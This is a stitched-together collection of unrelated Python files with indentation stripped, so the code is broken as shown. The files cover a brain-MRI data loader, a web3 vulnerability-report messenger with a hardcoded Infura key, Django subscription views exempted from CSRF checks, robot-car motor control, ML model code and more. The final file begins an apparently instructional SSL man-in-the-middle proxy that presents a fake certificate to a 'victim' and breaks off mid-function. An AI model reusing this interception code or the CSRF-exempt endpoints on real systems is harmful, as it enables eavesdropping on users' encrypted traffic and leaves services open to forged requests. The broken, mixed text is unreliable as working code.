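# Minimal usage sketch (an illustrative addition; this module only builds the
# aggregation pipeline, so no MongoDB connection is assumed here):
if __name__ == '__main__':
    import pprint
    # type=0: pipeline returning only the most recent document
    pprint.pprint(get_query(0))
    # type=1: one document per day over an explicit date range
    pprint.pprint(get_query(1,
                            date_from=dt.datetime(2020, 1, 1),
                            date_to=dt.datetime(2020, 2, 1)))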
|
from os import listdir
from os.path import join, isfile
import random
from scipy import io as sio
import numpy as np
import copy
from ipdb import set_trace as st
from math import ceil
class BRATS():
def __init__(self,opt,phase):
super(BRATS, self).__init__()
random.seed(0)
self.dataroot = opt.dataroot
self.root = join(self.dataroot,phase)
self.flist = []
self.root = opt.dataroot
        ## The numpy file is a list of filename paths, one per slice of the brain images.
        ## For fast data loading, the brain images are saved and loaded slice by slice.
self.flist = np.load(join(opt.dataroot, phase+'_flist_main_z.npy'))
self.N = 4
self.nCh_out = 1
self.nCh_in = self.N*self.nCh_out + self.N #opt.nCh_in
self.nY = 240
self.nX = 240
self.len = len(self.flist)
self.fExp = ['O','C','T','F'] #'S'
self.AUG = (phase=='train') and opt.AUG
self.use_norm_std = (not opt.wo_norm_std)
self.N_null = opt.N_null
# Here, for dropout input (not used)
self.null_N_set = [x+1 for x in range(opt.N_null)] #[1,2,3,4]
self.list_for_null = []
for i in range(self.N):
self.list_for_null.append( self.get_null_list_for_idx(i) )
def get_info(self,opt):
opt.nCh_in = self.nCh_in
opt.nCh_out= self.nCh_out
opt.nY = self.nY
opt.nX = self.nX
return opt
def getBatch(self, start, end):
nB = end-start
end = min([end,self.len])
start = end-nB
batch = self.flist[start:end]
sz_a = [end-start, self.nCh_out, self.nY, self.nX]
sz_M = [end-start, self.nCh_out, self.nY, self.nX]
target_class_idx = np.empty([end-start,1],dtype=np.uint8)
O_img = np.empty(sz_a, dtype=np.float32)
C_img = np.empty(sz_a, dtype=np.float32)
T_img = np.empty(sz_a, dtype=np.float32)
F_img = np.empty(sz_a, dtype=np.float32)
target_img = np.empty(sz_a, dtype=np.float32)
O_mask = np.zeros(sz_M, dtype=np.float32)
C_mask = np.zeros(sz_M, dtype=np.float32)
T_mask = np.zeros(sz_M, dtype=np.float32)
F_mask = np.zeros(sz_M, dtype=np.float32)
targ_idx = random.randint(0,self.N-1)
tar_class_bools = [x==targ_idx for x in range(self.N) ]
for iB, aBatch in enumerate(batch):
O_tmp = self.read_mat(join(self.root, aBatch+'O.mat'))
C_tmp = self.read_mat(join(self.root, aBatch+'C.mat'))
T_tmp = self.read_mat(join(self.root, aBatch+'T.mat'))
F_tmp = self.read_mat(join(self.root, aBatch+'F.mat'))
if self.AUG:
if random.randint(0,1):
O_tmp = np.flip(O_tmp, axis=1)
C_tmp = np.flip(C_tmp, axis=1)
T_tmp = np.flip(T_tmp, axis=1)
F_tmp = np.flip(F_tmp, axis=1)
scale = random.uniform(0.9,1.1)
O_tmp = O_tmp*scale
C_tmp = C_tmp*scale
T_tmp = T_tmp*scale
F_tmp = F_tmp*scale
O_img[iB,:,:,:] = O_tmp
C_img[iB,:,:,:] = C_tmp
T_img[iB,:,:,:] = T_tmp
F_img[iB,:,:,:] = F_tmp
##
if targ_idx==0:
target_img[iB,:,:,:] = O_img[iB,:,:,:]
O_mask[iB,0,:,:] = 1.
elif targ_idx==1:
target_img[iB,:,:,:] = C_img[iB,:,:,:]
C_mask[iB,0,:,:] = 1.
elif targ_idx==2:
target_img[iB,:,:,:] = T_img[iB,:,:,:]
T_mask[iB,0,:,:] = 1.
elif targ_idx==3:
target_img[iB,:,:,:] = F_img[iB,:,:,:]
F_mask[iB,0,:,:] = 1.
else:
st()
target_class_idx[iB] = targ_idx
return target_class_idx, O_img, C_img, T_img, F_img, O_mask, C_mask, T_mask, F_mask, tar_class_bools, target_img
def getBatch_dir(self, start, end, _id=-1):
nB = end-start
end = min([end,self.len])
start = end-nB
batch = self.flist[start:end]
sz_a = [end-start, self.nCh_out, self.nY, self.nX]
sz_M = [end-start, self.nCh_out, self.nY, self.nX]
target_class_idx = np.empty([end-start,1],dtype=np.uint8)
O_img = np.empty(sz_a, dtype=np.float32)
C_img = np.empty(sz_a, dtype=np.float32)
T_img = np.empty(sz_a, dtype=np.float32)
F_img = np.empty(sz_a, dtype=np.float32)
target_img = np.empty(sz_a, dtype=np.float32)
O_mask = np.zeros(sz_M, dtype=np.float32)
C_mask = np.zeros(sz_M, dtype=np.float32)
T_mask = np.zeros(sz_M, dtype=np.float32)
F_mask = np.zeros(sz_M, dtype=np.float32)
        '''Things to change for new CollaGAN DB (1/3)'''
if _id==-1:
targ_idx = random.randint(0,self.N-1)
else:
targ_idx = _id
tar_class_bools = [x==targ_idx for x in range(self.N) ]
for iB, aBatch in enumerate(batch):
a_dir = aBatch
O_tmp = self.read_mat(join(self.root, aBatch+'O.mat'))
C_tmp = self.read_mat(join(self.root, aBatch+'C.mat'))
T_tmp = self.read_mat(join(self.root, aBatch+'T.mat'))
F_tmp = self.read_mat(join(self.root, aBatch+'F.mat'))
if self.AUG:
if random.randint(0,1):
O_tmp = np.flip(O_tmp, axis=1)
C_tmp = np.flip(C_tmp, axis=1)
T_tmp = np.flip(T_tmp, axis=1)
F_tmp = np.flip(F_tmp, axis=1)
scale = random.uniform(0.9,1.1)
O_tmp = O_tmp*scale
C_tmp = C_tmp*scale
T_tmp = T_tmp*scale
F_tmp = F_tmp*scale
O_img[iB,:,:,:] = O_tmp
C_img[iB,:,:,:] = C_tmp
T_img[iB,:,:,:] = T_tmp
F_img[iB,:,:,:] = F_tmp
##
if targ_idx==0:
target_img[iB,:,:,:] = O_img[iB,:,:,:]
O_mask[iB,0,:,:] = 1.
elif targ_idx==1:
target_img[iB,:,:,:] = C_img[iB,:,:,:]
C_mask[iB,0,:,:] = 1.
elif targ_idx==2:
target_img[iB,:,:,:] = T_img[iB,:,:,:]
T_mask[iB,0,:,:] = 1.
elif targ_idx==3:
target_img[iB,:,:,:] = F_img[iB,:,:,:]
F_mask[iB,0,:,:] = 1.
else:
st()
target_class_idx[iB] = targ_idx
return target_class_idx, O_img, C_img, T_img, F_img, O_mask, C_mask, T_mask, F_mask, tar_class_bools, target_img, a_dir
def shuffle(self, seed=0):
random.seed(seed)
random.shuffle(self.flist)
def name(self):
return 'BRATS dataset'
def __len__(self):
return self.len
def get_null_list_for_idx(self, idx):
a_list = []
for i_null in self.null_N_set:
tmp_a = []
if i_null == 1:
tmp = [ bX==idx for bX in range(self.N) ]
tmp_a.append(tmp)
elif i_null ==2:
for i_in in range(self.N):
if not i_in==idx:
tmp = [ bX in [i_in, idx] for bX in range(self.N) ]
tmp_a.append(tmp)
elif i_null ==3:
for i_in in range(self.N):
for i2_in in range(self.N):
if not (i_in==i2_in or (i_in==idx or i2_in==idx)):
tmp = [ ( bX in [i_in, i2_in, idx]) for bX in range(self.N) ]
tmp_a.append(tmp)
elif i_null ==4:
for i4_in in range(self.N):
if not (i4_in==idx):
tmp = [ (bX==idx or (not bX==i4_in)) for bX in range(self.N) ]
tmp_a.append(tmp)
else:
st()
a_list.append(tmp_a)
return a_list
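    # Added note for clarity: for N=4, idx=0 and null_N_set=[1, 2],
    # get_null_list_for_idx(0) returns one list of boolean masks per null
    # count, each mask always keeping the target index itself, e.g.
    #   [[[True, False, False, False]],
    #    [[True, True, False, False],
    #     [True, False, True, False],
    #     [True, False, False, True]]]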
@staticmethod
def read_mat(filename, var_name="img"):
mat = sio.loadmat(filename)
return mat[var_name]
if __name__ == "__main__":
from options.star_options import BaseOptions
opt = BaseOptions().parse()
DB_train = BRATS(opt,'train')
st()
idx,a,b,c,d, am,bm,cm,dm, bools, tar = DB_train.getBatch(0,1)
print('Return')
|
from web3 import Web3, HTTPProvider
from threading import Thread
from queue import Queue
import binascii
from scraper.scraper import Scraper
class Messenger(Thread):
def __init__(self, report_q, private_key, testnet):
Thread.__init__(self)
self.report_q = report_q
self.private_key = private_key
self.testnet = testnet
        self.daemon = True
def run(self):
# Abi of the messaging smart contract
# abi = '''[{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"last_msg_index","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"constant":false,"inputs":[{"name":"_key","type":"string"},{"name":"_type","type":"string"}],"name":"setPublicKey","outputs":[],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_who","type":"address"},{"name":"_index","type":"uint256"}],"name":"newMessage","outputs":[{"name":"","type":"bool"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_who","type":"address"},{"name":"_index","type":"uint256"}],"name":"getMessageByIndex","outputs":[{"name":"","type":"address"},{"name":"","type":"string"},{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"keys","outputs":[{"name":"key","type":"string"},{"name":"key_type","type":"string"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_who","type":"address"}],"name":"getPublicKey","outputs":[{"name":"_key","type":"string"},{"name":"_key_type","type":"string"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"},{"name":"","type":"uint256"}],"name":"messages","outputs":[{"name":"from","type":"address"},{"name":"text","type":"string"},{"name":"time","type":"uint256"}],"payable":false,"type":"function"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_text","type":"string"}],"name":"sendMessage","outputs":[],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_who","type":"address"}],"name":"getLastMessage","outputs":[{"name":"","type":"address"},{"name":"","type":"string"},{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"constant":true,"inputs":[{"name":"_owner","type":"address"}],"name":"lastIndex","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"constant":true,"inputs":[],"name":"message_staling_period","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function"},{"anonymous":false,"inputs":[{"indexed":true,"name":"_sender","type":"address"},{"indexed":true,"name":"_receiver","type":"address"},{"indexed":false,"name":"_time","type":"uint256"},{"indexed":false,"name":"message","type":"string"}],"name":"Message","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"_sender","type":"address"},{"indexed":false,"name":"_key","type":"string"},{"indexed":false,"name":"_keytype","type":"string"}],"name":"PublicKeyUpdated","type":"event"}]'''
if self.testnet:
web3 = Web3(Web3.HTTPProvider('https://ropsten.infura.io/v3/29e5c62848414895b549aa4befebe614'))
else:
web3 = Web3(Web3.HTTPProvider('https://mainnet.infura.io/v3/29e5c62848414895b549aa4befebe614'))
acc = web3.eth.account.privateKeyToAccount(self.private_key)
if not web3.isConnected():
Scraper.log("Messaging:\tNo connection established")
# Messaging smart contract to use if not sending a direct transaction to the contract owner
# messaging = web3.eth.contract(address="0xCdcDD44f7f617B965983a8C1bB0B845A5766FEbA", abi=abi)
Scraper.log("Messaging:\tWaiting for messages")
nonce = 1
while True:
(address, message) = self.report_q.get()
if message is None:
break
message = "Hello, We scanned a smart contract you deployed and found a vulnrability in it, here is the report:\n" + message
transaction = {
'to' : web3.toChecksumAddress(address),
'from' : acc.address,
'value' : 0,
'gasPrice' : web3.eth.gasPrice,
'nonce' : web3.eth.getTransactionCount(acc.address),
'data' : message.encode('utf-8').hex()
}
transaction['gas'] = web3.eth.estimateGas(transaction)
# transaction = messaging.functions.sendMessage(address, message).buildTransaction({'from': acc.address, 'nonce': '0x%02x' % web3.eth.getTransactionCount(address)} # Use this to send the message to a messaging smart contract)
signed = acc.signTransaction(transaction)
tx = web3.eth.sendRawTransaction(signed.rawTransaction)
Scraper.log("Messaging:\tSent message")
Scraper.log("Messaging:\tReceived terminator, shutting down...")
|
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
from django.utils import timezone
from django.core import serializers
from .models import *
from user.models import *
from urllib.parse import quote, unquote
from project.config import APIConfig
import json, requests, datetime
APP_LIST_URL = APIConfig['APP_LIST_URL']
def timestamp_to_date(js_timestamp):
return datetime.datetime.fromtimestamp(int(js_timestamp) / 1000).date()
def calc_subscription_bill(sub_type, bill):
bill_types = {
'W': [ 'week_bill', { 'M': 4, 'Y': 52 } ],
'M': [ 'month_bill', { 'Y': 12 } ],
'Y': [ 'year_bill', {} ],
}
bills = {
'week_bill': 0,
'month_bill': 0,
'year_bill': 0,
}
if sub_type == 'L':
return bills
bills[bill_types[sub_type][0]] = bill
for k, v in bill_types[sub_type][1].items():
bills[bill_types[k][0]] = bill * v
return bills
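# Worked example (illustrative comment only): a monthly plan of 10,000 is
# projected to 120,000 per year, while the weekly figure stays 0 because
# shorter periods are never back-filled from longer ones:
#   calc_subscription_bill('M', 10000)
#   -> {'week_bill': 0, 'month_bill': 10000, 'year_bill': 120000}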
@csrf_exempt
def add(req):
reqobj = {
'session_id': req.POST.get('session_id'),
'app_name': req.POST.get('app_name'),
'app_img_url': req.POST.get('app_img_url'),
'sub_type': req.POST.get('sub_type'),
'bill': req.POST.get('bill'),
'startdate': req.POST.get('startdate'),
'enddate': req.POST.get('enddate'),
}
resobj = {
'is_add': False,
'error_msg': None,
}
try:
session = Session.objects.get(
session_id = reqobj['session_id']
)
except Session.DoesNotExist:
session = None
resobj['error_msg'] = 'Session does not exist'
return JsonResponse(resobj)
user = User.objects.get(email = session.email)
try:
app = Application.objects.get(
app_name = quote(reqobj['app_name'])
)
except Application.DoesNotExist:
app = Application()
app.app_name = quote(reqobj['app_name'])
app.app_img_url = reqobj['app_img_url']
app.save()
try:
subscription = Subscription.objects.get(
email = user.email, app_id = app.app_id
)
resobj['error_msg'] = 'Already subscribed'
return JsonResponse(resobj)
except Subscription.DoesNotExist:
subscription = Subscription()
subscription.app_id = app
subscription.email = user
        # TODO: Test sub_type TextChoices .label value later
subscription.sub_type = reqobj['sub_type'][0:1].upper()
subscription.bill = int(reqobj['bill'].replace(',', ''))
subscription.startdate = timestamp_to_date(reqobj['startdate'])
subscription.enddate = timestamp_to_date(reqobj['enddate'])
subscription.created_at = timezone.now()
subscription.save()
try:
subscription_bill = Subscription_Bill.objects.get(
email = user.email, app_id = app.app_id
)
resobj['error_msg'] = 'Already subscribed (bill info)'
return JsonResponse(resobj)
except Subscription_Bill.DoesNotExist:
subscription_bill = Subscription_Bill()
subscription_bill.app_id = app
subscription_bill.email = user
sub_bills = calc_subscription_bill(
reqobj['sub_type'][0:1].upper(),
int(reqobj['bill'].replace(',', ''))
)
subscription_bill.week_bill = sub_bills['week_bill']
subscription_bill.month_bill = sub_bills['month_bill']
subscription_bill.year_bill = sub_bills['year_bill']
subscription_bill.save()
resobj['is_add'] = True
return JsonResponse(resobj)
@csrf_exempt
def get(req):
reqobj = {
'session_id': req.POST.get('session_id'),
}
resobj = {
'is_get': False,
'error_msg': None,
'subscriptions': [],
}
try:
session = Session.objects.get(
session_id = reqobj['session_id']
)
except Session.DoesNotExist:
        resobj['error_msg'] = 'Session does not exist'
return JsonResponse(resobj)
qs_subscriptions = Subscription.objects.filter(
email = session.email
)
for sub_info in qs_subscriptions:
try:
app = Application.objects.get(app_id = sub_info.app_id.app_id)
subscription_bill = Subscription_Bill.objects.get(
email = session.email, app_id = sub_info.app_id
)
sub_type_index = sub_info.SubscriptionTypes.values.index(
sub_info.sub_type
)
sub_info_json = {
'app_id': app.app_id,
'app_name': unquote(app.app_name),
'app_img_url': app.app_img_url,
'sub_type': sub_info.sub_type,
'sub_type_label': sub_info.SubscriptionTypes.labels[sub_type_index],
'bill': sub_info.bill,
'startdate': sub_info.startdate,
'enddate': sub_info.enddate,
'week_bill': subscription_bill.week_bill,
'month_bill': subscription_bill.month_bill,
'year_bill': subscription_bill.year_bill,
}
resobj['subscriptions'].append(sub_info_json)
except Application.DoesNotExist:
            resobj['error_msg'] = str(sub_info.app_id_id) + ' - No such application'
return JsonResponse(resobj)
resobj['is_get'] = True
return JsonResponse(resobj)
@csrf_exempt
def update(req):
reqobj = {
'session_id': req.POST.get('session_id'),
'app_id': req.POST.get('app_id'),
'app_name': req.POST.get('app_name'),
'app_img_url': req.POST.get('app_img_url'),
'sub_type': req.POST.get('sub_type'),
'bill': req.POST.get('bill'),
'startdate': req.POST.get('startdate'),
'enddate': req.POST.get('enddate'),
}
resobj = {
'is_update': False,
'error_msg': None,
}
try:
session = Session.objects.get(session_id = reqobj['session_id'])
app = Application.objects.get(app_id = reqobj['app_id'])
subscription = Subscription.objects.get(
email = session.email, app_id = app.app_id
)
subscription_bill = Subscription_Bill.objects.get(
email = session.email, app_id = app.app_id
)
subscription.sub_type = reqobj['sub_type'][0:1].upper()
subscription.bill = int(reqobj['bill'].replace(',', ''))
subscription.startdate = timestamp_to_date(reqobj['startdate'])
subscription.enddate = timestamp_to_date(reqobj['enddate'])
sub_bills = calc_subscription_bill(
subscription.sub_type,
subscription.bill
)
subscription_bill.week_bill = sub_bills['week_bill']
subscription_bill.month_bill = sub_bills['month_bill']
subscription_bill.year_bill = sub_bills['year_bill']
subscription.save()
subscription_bill.save()
except Session.DoesNotExist:
resobj['error_msg'] = 'Session does not exist'
return JsonResponse(resobj)
except Application.DoesNotExist:
resobj['error_msg'] = 'Application is not subscribed'
return JsonResponse(resobj)
resobj['is_update'] = True
return JsonResponse(resobj)
@csrf_exempt
def delete(req):
reqobj = {
'session_id': req.POST.get('session_id'),
'app_id': req.POST.get('app_id'),
}
resobj = {
'is_delete': False,
'error_msg': None,
}
try:
session = Session.objects.get(
session_id = reqobj['session_id']
)
app = Application.objects.get(
app_id = reqobj['app_id']
)
subscription = Subscription.objects.get(
email = session.email,
app_id = app.app_id
)
subscription_bill = Subscription_Bill.objects.get(
email = session.email,
app_id = app.app_id
)
# TODO Check constraint for email attribute
app.delete()
subscription.delete()
subscription_bill.delete()
except Session.DoesNotExist:
        resobj['error_msg'] = 'Session does not exist'
return JsonResponse(resobj)
except Application.DoesNotExist:
resobj['error_msg'] = 'The application is not subscribed'
return JsonResponse(resobj)
resobj['is_delete'] = True
return JsonResponse(resobj)
def applist(req):
resobj = {
'is_applist': False,
'error_msg': None,
'applist': None,
}
res = requests.get(APP_LIST_URL)
if res is not None:
if res.text is not None:
resobj['is_applist'] = True
resobj['applist'] = json.loads(res.text)
else:
resobj['error_msg'] = 'App List cannot be fetched'
return JsonResponse(resobj)
|
def fibonacci(n):
if n == 0:
return 0
if n == 1:
return 1
num1 = fibonacci(n - 1)
num2 = fibonacci(n- 2)
return num1 + num2
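# Optional sketch of a memoised variant: functools.lru_cache turns the
# exponential recursion above into linear time for larger n, while the
# original fibonacci() is kept unchanged below.
from functools import lru_cache

@lru_cache(maxsize=None)
def fibonacci_cached(n):
    if n < 2:
        return n
    return fibonacci_cached(n - 1) + fibonacci_cached(n - 2)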
fib_list = []
for i in range(0, 11):
fib_list.append(fibonacci(i))
print(fib_list) |
from flask import Blueprint, request, stream_with_context
from aleph.model import Match, Audit
from aleph.logic.audit import record_audit
from aleph.views.util import get_db_collection, jsonify, stream_csv
from aleph.search import QueryParser, DatabaseQueryResult
from aleph.serializers import MatchSchema, MatchCollectionsSchema
from aleph.serializers.xref import XrefSchema
from aleph.logic.xref import xref_collection, export_matches_csv
from aleph.views.util import parse_request
blueprint = Blueprint('xref_api', __name__)
@blueprint.route('/api/2/collections/<int:id>/xref', methods=['GET'])
def index(id):
collection = get_db_collection(id)
record_audit(Audit.ACT_COLLECTION, id=collection.id)
parser = QueryParser(request.args, request.authz)
q = Match.group_by_collection(collection.id, authz=request.authz)
result = DatabaseQueryResult(request, q,
parser=parser,
schema=MatchCollectionsSchema)
return jsonify(result)
@blueprint.route('/api/2/collections/<int:id>/xref/<int:other_id>',
methods=['GET'])
def matches(id, other_id):
collection = get_db_collection(id)
record_audit(Audit.ACT_COLLECTION, id=collection.id)
other = get_db_collection(other_id)
record_audit(Audit.ACT_COLLECTION, id=other.id)
parser = QueryParser(request.args, request.authz)
q = Match.find_by_collection(collection.id, other.id)
result = DatabaseQueryResult(request, q,
parser=parser,
schema=MatchSchema)
return jsonify(result)
@blueprint.route('/api/2/collections/<int:id>/xref', methods=['POST'])
def generate(id):
data = parse_request(XrefSchema)
collection = get_db_collection(id, request.authz.WRITE)
against_ids = data.get("against_collection_ids")
xref_collection.apply_async([collection.id], kwargs={"against_collection_ids": against_ids}, priority=5)
return jsonify({'status': 'accepted'}, status=202)
@blueprint.route('/api/2/collections/<int:id>/xref.csv')
def csv_export(id):
collection = get_db_collection(id, request.authz.READ)
record_audit(Audit.ACT_COLLECTION, id=id)
matches = export_matches_csv(collection.id, request.authz)
return stream_csv(stream_with_context(matches))
|
"""
byceps.services.user.dbmodels.user
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from datetime import datetime
from typing import Optional
from sqlalchemy.ext.associationproxy import association_proxy
from ....database import db, generate_uuid
from ....util.instances import ReprBuilder
from ...user_avatar.dbmodels import AvatarSelection
class User(db.Model):
"""A user."""
__tablename__ = 'users'
id = db.Column(db.Uuid, default=generate_uuid, primary_key=True)
created_at = db.Column(db.DateTime, nullable=False)
screen_name = db.Column(db.UnicodeText, unique=True, nullable=True)
email_address = db.Column(db.UnicodeText, unique=True, nullable=True)
email_address_verified = db.Column(db.Boolean, default=False, nullable=False)
initialized = db.Column(db.Boolean, default=False, nullable=False)
suspended = db.Column(db.Boolean, default=False, nullable=False)
deleted = db.Column(db.Boolean, default=False, nullable=False)
locale = db.Column(db.UnicodeText, nullable=True)
legacy_id = db.Column(db.UnicodeText, nullable=True)
avatar = association_proxy('avatar_selection', 'avatar',
creator=lambda avatar:
AvatarSelection(None, avatar.id))
def __init__(
self,
created_at: datetime,
screen_name: Optional[str],
email_address: Optional[str],
*,
locale: Optional[str] = None,
legacy_id: Optional[str] = None,
) -> None:
self.created_at = created_at
self.screen_name = screen_name
self.email_address = email_address
self.locale = locale
self.legacy_id = legacy_id
@property
def avatar_url(self) -> Optional[str]:
avatar = self.avatar
return avatar.url if (avatar is not None) else None
def __eq__(self, other) -> bool:
return (other is not None) and (self.id == other.id)
def __hash__(self) -> int:
if self.id is None:
raise ValueError(
'User instance is unhashable because its id is None.'
)
return hash(self.id)
def __repr__(self) -> str:
return ReprBuilder(self) \
.add_with_lookup('id') \
.add_with_lookup('screen_name') \
.build()
|
from socket import *
import RPi.GPIO as GPIO
import time
print "Self-Driving Car Motor Module"
GPIO.setmode(GPIO.BCM)
#Signal pin definition
#LED port definition
LED0 = 10
LED1 = 9
LED2 = 25
#Motor drive port definition
ENA = 13 #//L298 Enable A
ENB = 20 #//L298 Enable B
IN1 = 19 #//Motor port 1
IN2 = 16 #//Motor port 2
IN3 = 21 #//Motor port 3
IN4 = 26 #//Motor port 4
#Servo port definition
SER1 = 11 #Servo1
SER2 = 8 #Servo2
SER3 = 7 #Servo3
SER4 = 5 #Servo4
SER7 = 6 #Vertical servo port servo7
SER8 = 12 #Horizontal servo port servo8
#Ultrasonic port definition
ECHO = 4 #Ultrasonic receiving foot position
TRIG = 17 #Ultrasonic sending foot position
#Infrared sensor port definition
IR_R = 18 #Right line following infrared sensor
IR_L = 27 #Left line following infrared sensor
IR_M = 22 #Middle obstacle avoidance infrared sensor
IRF_R = 23 #Right object tracking infrared sensor
IRF_L = 24 #Left object tracking infrared sensor
global Cruising_Flag
Cruising_Flag = 0 #//Current circulation mode
global Pre_Cruising_Flag
Pre_Cruising_Flag = 0 #//Previous cruising mode
Left_Speed_Hold = 255 #//Define left speed variable
Right_Speed_Hold = 255 #//Define right speed variable
#Pin type setup and initialization
GPIO.setwarnings(False)
#led initialized to 000
GPIO.setup(LED0,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(LED1,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(LED2,GPIO.OUT,initial=GPIO.HIGH)
#motor initialized to LOW
GPIO.setup(ENA,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN1,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN2,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(ENB,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN3,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN4,GPIO.OUT,initial=GPIO.LOW)
#Servo pin type set
GPIO.setup(SER1,GPIO.OUT)#Servo1
GPIO.setup(SER2,GPIO.OUT)#Servo2
GPIO.setup(SER3,GPIO.OUT)#Servo3
GPIO.setup(SER4,GPIO.OUT)#Servo4
GPIO.setup(SER7,GPIO.OUT)#Horizontal servo port servo7
GPIO.setup(SER8,GPIO.OUT)#Vertical servo port servo8
Servo7=GPIO.PWM(SER7,50) #50HZ
Servo7.start(90)
Servo8=GPIO.PWM(SER8,50) #50HZ
Servo8.start(90)
# Motor Control
def Motor_Forward():
print 'motor forward'
GPIO.output(ENA,True)
GPIO.output(ENB,True)
GPIO.output(IN1,True)
GPIO.output(IN2,False)
GPIO.output(IN3,True)
GPIO.output(IN4,False)
GPIO.output(LED1,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,False)#Headlight's anode to 5V, cathode to IO port
def Motor_Backward():
print 'motor_backward'
GPIO.output(ENA,True)
GPIO.output(ENB,True)
GPIO.output(IN1,False)
GPIO.output(IN2,True)
GPIO.output(IN3,False)
GPIO.output(IN4,True)
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,False)#Headlight's anode to 5V, cathode to IO port
def Motor_TurnLeft():
print 'motor_turnleft'
GPIO.output(ENA,True)
GPIO.output(ENB,True)
GPIO.output(IN1,True)
GPIO.output(IN2,False)
GPIO.output(IN3,False)
GPIO.output(IN4,True)
GPIO.output(LED1,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
def Motor_TurnRight():
print 'motor_turnright'
GPIO.output(ENA,True)
GPIO.output(ENB,True)
GPIO.output(IN1,False)
GPIO.output(IN2,True)
GPIO.output(IN3,True)
GPIO.output(IN4,False)
GPIO.output(LED1,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
def Motor_Stop():
print 'motor_stop'
GPIO.output(ENA,False)
GPIO.output(ENB,False)
GPIO.output(IN1,False)
GPIO.output(IN2,False)
GPIO.output(IN3,False)
GPIO.output(IN4,False)
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
#Servo angle drive function
def SetServo7Angle(angle_from_protocol):
    angle = int(angle_from_protocol, 16)
    Servo7.ChangeDutyCycle(2.5 + 10.0 * angle / 180) #set horizontal servo rotation angle
GPIO.output(LED0,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED1,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
time.sleep(0.01)
GPIO.output(LED0,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
def SetServo8Angle(angle_from_protocol):
    angle = int(angle_from_protocol, 16)
    Servo8.ChangeDutyCycle(2.5 + 10.0 * angle / 180) #set vertical servo rotation angle
GPIO.output(LED0,False)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,False)#Headlight's anode to 5V, cathode to IO port
time.sleep(0.01)
GPIO.output(LED0,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED1,True)#Headlight's anode to 5V, cathode to IO port
GPIO.output(LED2,True)#Headlight's anode to 5V, cathode to IO port
|
"""ViT Classification model."""
from scenic.model_lib.base_models.classification_model import ClassificationModel
from scenic.projects.baselines import vit
class ViTClassificationModel(ClassificationModel):
"""ViT model for classification task."""
def build_flax_model(self):
return vit.ViT(
num_classes=self.dataset_meta_data['num_classes'],
mlp_dim=self.config.model.mlp_dim,
num_layers=self.config.model.num_layers,
num_heads=self.config.model.num_heads,
representation_size=self.config.model.representation_size,
patches=self.config.model.patches,
hidden_size=self.config.model.hidden_size,
classifier=self.config.model.classifier,
dropout_rate=self.config.model.get('dropout_rate', 0.1),
attention_dropout_rate=self.config.model.get('attention_dropout_rate',
0.1),
dtype='float32',
)
|
from neuronalnetwork import *
import matplotlib.pyplot as plt
import os
from os.path import isdir
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Mountain Car with a neuronal network')
parser.add_argument(dest='dirname', default="./")
args = parser.parse_args()
print("args:", args)
if isdir(args.dirname):
networks = [args.dirname+f for f in os.listdir(args.dirname) if '.json' in f]
else:
networks = [args.dirname]
for nf in networks:
net = MountainCarNeuronalNetwork(warm_start=nf)
net.display_network(name=nf)
plt.show(block=True)
|
from socket import *
import ssl
import threading
import time
import re
import httplib
import struct
import string
import os
import sys
import socket as Socket
import select
class handler(threading.Thread):
def __init__(self,socket, port) :
threading.Thread.__init__(self)
self.socket=socket
self.client_port = socket.getpeername()[1]
self.default_port = port
# A flag to denote ssl state
self.sslenable = False
def initSSLConnection(self, clientSocket):
# Use your fake certificate to establish connection to victim
# This function should use
# 1. send back "HTTP/1.1 200 Connection established\r\n\r\n"
# 2. use ssl.wrap_socket to establish ssl-wrap socket connect to victim(use fake certificate )
# 3. return the ssl-wrap socket
# ======== Your Code Here!! =======================
clientSocket.send("HTTP/1.1 200 Connection established\r\n\r\n")
wsock = ssl.wrap_socket(clientSocket, "myCA.pem", "myCA.pem", server_side=True, ssl_version=ssl.PROTOCOL_TLS)
return wsock
def CreateSocketAndConnectToOriginDst(self , host, port):
        # if the port is not 443 (plain HTTP), create a socket that connects directly to the original website
        # if the port is 443 (HTTPS), create an ssl-wrapped socket and connect to the origin website
